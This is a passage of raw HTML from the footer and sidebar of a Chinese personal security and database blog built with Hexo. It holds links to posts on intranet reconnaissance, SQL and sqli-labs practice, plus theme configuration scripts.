href="/2022/12/23/%E5%9F%9F%E5%86%85%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" title="内网信息收集">内网信息收集</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%95%B0%E6%8D%AE%E5%BA%93/" title="分类于 数据库">数据库</a></div><span><a href="/2022/12/03/%E5%85%B3%E7%B3%BB%E6%95%B0%E6%8D%AE%E5%BA%93%E6%A0%87%E5%87%86%E8%AF%AD%E8%A8%80SQL/" title="关系数据库标准语言SQL">关系数据库标准语言SQL</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Web/" title="分类于 Web">Web</a></div><span><a href="/2022/09/23/%E5%9F%BA%E4%BA%8Esql-labs%E9%9D%B6%E5%9C%BA%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6%E7%AF%87/" title="基于sqli-labs进阶学习">基于sqli-labs进阶学习</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%95%B0%E6%8D%AE%E5%BA%93/" title="分类于 数据库">数据库</a></div><span><a href="/2022/12/06/%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%AE%89%E5%85%A8%E6%80%A7/" title="数据库安全性">数据库安全性</a></span></li></ul></div><div><h2>最新评论</h2><ul class="leancloud-recent-comment"></ul></div></div><div class="status"><div class="copyright">&copy; 2010 – <span itemprop="copyrightYear">2023</span> <span class="with-love"><i class="ic i-sakura rotate"></i> </span><span class="author" itemprop="copyrightHolder">Clown @ ClownのBlog</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i> </span><span title="站点总字数">591k 字</span> <span class="post-meta-divider">|</span> <span class="post-meta-item-icon"><i class="ic i-coffee"></i> </span><span title="站点阅读时长">8:57</span></div><div class="powered-by">基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL={path:"2023/07/15/Chronos的靶机打靶记录/",favicon:{show:"（●´3｀●）やれやれだぜ",hide:"(´Д｀)大変だ！"},search:{placeholder:"文章搜索",empty:"关于 「 ${query} 」，什么也没搜到",stats:"${time} ms 内找到 ${hits} 条结果"},valine:!0,fancybox:!0,copyright:'复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',ignores:[function(e){return e.includes("#")},function(e){return new RegExp(LOCAL.path+"$").test(e)}]}</script><script src="https://cdn.polyfill.io/v2/polyfill.js"></script><script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script><script src="/js/app.js?v=0.2.5"></script></body></html><!-- rebuild by hrmmi -->